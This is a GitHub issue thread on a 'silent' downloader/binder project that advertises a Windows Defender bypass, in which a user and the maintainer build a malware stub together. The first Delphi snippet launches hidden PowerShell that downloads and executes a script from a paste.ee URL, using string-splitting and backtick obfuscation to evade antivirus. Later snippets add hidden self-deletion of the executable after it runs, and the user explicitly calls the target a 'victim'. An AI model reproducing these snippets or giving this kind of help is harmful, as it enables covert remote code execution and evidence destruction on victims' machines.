Self Destruct Feature - Githubissues

UnamSanctam / UnamDownloader

A Free Silent (Hidden) Open Source Downloader (Binder) - Includes Windows Defender Bypass - Build Native - Unam Downloader

MIT License

173 stars 56 forks source link

Self Destruct Feature #56

Open msfcon5ol3 opened 1 year ago

msfcon5ol3 commented 1 year ago

This code snipped below is Delphi based, I was gonna use C# but too many AV detections. Could you help me to add a self-destruct function to delete the file from the disk after execution. Thanks for your help.

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'IEX(New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘paste.ee/r/l2tlb/0’)', nil, SW_HIDE);
end.

UnamSanctam commented 1 year ago

In the powershell command add a delay and then a command to remove the file (itself).

msfcon5ol3 commented 1 year ago

In the powershell command add a delay and then a command to remove the file (itself).

This worked but if there's a case in which the file is renamed by victim , this makes this command useless. What could I do here instead of using the file name as the method of deletion ?

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item payload.exe -Force', nil, SW_HIDE);
end.

UnamSanctam commented 1 year ago

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

msfcon5ol3 commented 1 year ago

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

Could you edit the code for me please I'm noob in Delphi ?

You could try using ParamStr(0) (in Delphi, not in the powershell command) instead to get the current executable path.

UnamSanctam commented 1 year ago

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

msfcon5ol3 commented 1 year ago

Would probably be something like:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', 'start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force', nil, SW_HIDE);
end.

Thanks but compilation error, I'm still trying to fix it....

UnamSanctam commented 1 year ago

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

msfcon5ol3 commented 1 year ago

If you haven't already solved it then you might be able to do:

{$APPTYPE GUI}

uses Windows, ShellApi;

begin
  ShellExecute(0, nil, 'powershell', PChar('start calc.exe;Remove-Item ''' + ParamStr(0) + ''' -Force'), nil, SW_HIDE);
end.

Thanks finally it worked like charm, really appreciate your help. If you want you can add this as a new stub in UnamDownloader for the next release but you may have to add some delphi / pascal compiler to your repository and the other options such as start delay , fake error, run as admin etc.

UnamSanctam commented 1 year ago

No problem and great that it worked. And I probably won't use it since I'm planning on other things but thank you.